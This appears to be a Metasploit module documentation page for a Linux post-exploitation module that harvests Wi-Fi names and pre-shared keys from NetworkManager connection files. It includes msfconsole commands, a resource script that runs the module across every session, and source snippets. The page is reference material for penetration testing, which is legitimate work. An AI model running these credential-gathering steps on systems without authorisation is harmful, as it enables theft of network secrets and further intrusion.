Linux Gather 802-11-Wireless-Security Credentials - Metasploit


This page contains detailed information about how to use the post/linux/gather/enum_psk metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Linux Gather 802-11-Wireless-Security Credentials
Module: post/linux/gather/enum_psk
Source code: modules/post/linux/gather/enum_psk.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module collects 802-11-Wireless-Security credentials such as Access-Point name and Pre-Shared-Key from your target CLIENT Linux machine using /etc/NetworkManager/system-connections/ files. The module gathers NetworkManager's plaintext "psk" information.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/linux/gather/enum_psk

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/linux/gather/enum_psk
msf post(enum_psk) > show options
    ... show and set options ...
msf post(enum_psk) > set SESSION session-id
msf post(enum_psk) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/linux/gather/enum_psk")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the linux/gather/enum_psk post exploitation module looks in the msfconsole:

msf6 > use post/linux/gather/enum_psk

msf6 post(linux/gather/enum_psk) > show info

       Name: Linux Gather 802-11-Wireless-Security Credentials
     Module: post/linux/gather/enum_psk
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Cenk Kalpakoglu

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting                          Required  Description
  ----     ---------------                          --------  -----------
  DIR      /etc/NetworkManager/system-connections/  yes       The default path for network connections
  SESSION                                           yes       The session to run this module on.

Description:
  This module collects 802-11-Wireless-Security credentials such as 
  Access-Point name and Pre-Shared-Key from your target CLIENT Linux 
  machine using /etc/NetworkManager/system-connections/ files. The 
  module gathers NetworkManager's plaintext "psk" information.

Module Options


This is a complete list of options available in the linux/gather/enum_psk post exploitation module:

msf6 post(linux/gather/enum_psk) > show options

Module options (post/linux/gather/enum_psk):

   Name     Current Setting                          Required  Description
   ----     ---------------                          --------  -----------
   DIR      /etc/NetworkManager/system-connections/  yes       The default path for network connections
   SESSION                                           yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the linux/gather/enum_psk post exploitation module:

msf6 post(linux/gather/enum_psk) > show advanced

Module advanced options (post/linux/gather/enum_psk):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the linux/gather/enum_psk module can do:

msf6 post(linux/gather/enum_psk) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the linux/gather/enum_psk post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(linux/gather/enum_psk) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No PSK has been found!


Here is a relevant code snippet related to the "No PSK has been found!" error message:

71:	
72:	  def run
73:	    if is_root?
74:	      tbl = extract_all_creds
75:	      if tbl.rows.empty?
76:	        print_status('No PSK has been found!')
77:	      else
78:	        print_line("\n" + tbl.to_s)
79:	        p = store_loot(
80:	          'linux.psk.creds',
81:	          'text/csv',

You must run this module as root!


Here is a relevant code snippet related to the "You must run this module as root!" error message:

99:	            private_data: password,
100:	            private_type: :password,
101:	          )
102:	        end
103:	        print_status("Done")
104:	      end
105:	    else
106:	      print_error('You must run this module as root!')
107:	    end
108:	  end
109:	end

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Cenk Kalpakoglu

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.